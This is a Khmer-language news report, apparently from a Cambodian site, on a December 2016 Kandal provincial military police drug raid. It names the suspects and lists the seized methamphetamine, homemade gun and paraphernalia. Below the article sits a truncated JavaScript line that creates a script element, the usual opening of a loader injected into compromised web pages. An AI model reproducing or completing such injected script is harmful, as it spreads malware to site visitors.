ព្រឹតិ្តការណ៍ថ្មីៗ

អាវុធហត្ថខេត្តកណ្តាលបង្ក្រាបករណីចែកចាយនឹងប្រើប្រាស់សារធាតុញៀន ឃាត់ខ្លួនជនសង្ស័យ៣នាក់

1 ឆ្នាំ មុន 0 តូ សុផល

ខេត្តកណ្តាល៖ អនុវត្តន៏តាមភារកិច្ចស្នូលរបស់កងរាជអាវុធហត្ថ បង្ការ បង្ក្រាប និងសង្គ្រោះ ដែលជាយន្តកាដឹកនាំដ៏មានប្រសិទ្ធភាពរបស់ឯកឧត្តមនាយឧត្តមសេនីយ៏ សៅ សុខា អគ្គមេបញ្ជាការរងនៃកងយោធពលខេមរភូមិន្ទ ជាមេបញ្ជាការ កងរាជអាវុធហត្ថលើផ្ទៃប្រទេស និង ឯកឧត្តម ម៉ៅ ភិរុណ អភិបាលខេត្ត។ក្រោមការដឹកនាំបញ្ជារបស់លោកឧត្តមសេនីយ៏ សំ តុលា មេបញ្ជាការ កងរាជអាវុធហត្ថខេត្តកណ្តាល តែងតែយកចិត្តទុកដាក់ក្នុងការអនុវត្តន៏យន្តកាខាងលើ ពិសេសលោកមេបញ្ជាការបានជំរុញ តាស់តឿនក្រើនរំលឹក ដល់ជំនាញ មេបញ្ជាការគ្រប់លំដាប់ថ្នាក់ ឲ្យធ្វើសកម្មភាពបង្ការ បង្ក្រាប សង្គ្រោះ ជាប្រចាំដូចភ្លៀងរលឹម ។

ជាក់ស្តែង នៅថ្ងៃទី24.12.2016 កំលាំង អ ហ ស្រុកកៀនស្វាយ ដឹកនាំដោយលោកវ ត្រី អ៊ួន សុផាត មេបញ្ជាការស្រុកបានចុះបង្រ្កាបបទល្មើសគ្រឿងញៀននៅចំណុចមាត់ទន្លេរកោះតូចភូមិកណ្តាលលើ ឃុំបន្ទាយដែក ស្រុកកៀនស្វាយ ជាកន្លែងដែលជនល្មើសធ្វើសកម្មភាពចែកចាយរក្សាទុកនឹងប្រើប្រាស់គ្រឿងញៀន។

ជនសង្ស័យចំនួន05នាក់:
1.ឈ្មោះ ប៊ុន រដ្ធា ហៅអាតើម ភេទប្រុស អាយុ35ឆ្នាំ មុខរបរមិនពិតប្រាកដ។ មានទីលំនៅភូមិព្រែកតាគង់សង្កាត់ចាក់អង្រែលើខ័ណ្ឌមានជ័យភ្នំពេញ(ឃាត់ខ្លួន)។
2.ឈ្មោះ អុល វិសាល ភេទប្រុសអាយុ19ឆ្នាំ មុខរបរមិនពិតប្រាកដ។. មានទីលំនៅភូមិកណ្តាលលើ ឃុំបន្ទាយដែកស្រុកកៀនស្វាយ។
ដោយសហការណ៍ជាមួយលោកមេបញ្ចាការមូលដ្ធាន អាវុធហត្ថស្រុកល្វាឯម ឃាត់ខ្លួនជនសង្ស័យ បានដោយហែលឆ្លងទឺកទៅត្រើយម្ខាង។
3. ចំណែក 03នាក់ទៀតគេចខ្លួនមិនស្គាល់អត្តសញ្ញាណ ជំនាញកំពុងស្រាវជ្រាវបន្ត ។

វត្ថុតាងចាប់យក:
1ម្សៅថ្លាក្រាមពណ៑ស សង្ស័យសារធាតុញាណ(ម៉ាទឹកកក) ចំនួន119កញ្ចប់ ក្នុងនោះ 50កញ្ចប់ចូលទឹក រលាយក្នុងស្បោង 69កញ្ចប់នៅល្អ  កាំភ្លើងច្នៃ 01ដើមគ្រាប់កង់មួយប្រអប់    ជញ្ជីង សំរាប់ថ្លឹងថ្នាំ01  និងឧបករណ៍ សំរាប់ជក់។

បច្ចុប្បន្នជនសង្ស័យនឹងវត្ថុតាង ជំនាញ អាវុធហត្ថខេត្តនិងស្រុកកំពង់បន្តនិតិវិធីតាមច្បាប់។

 

var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ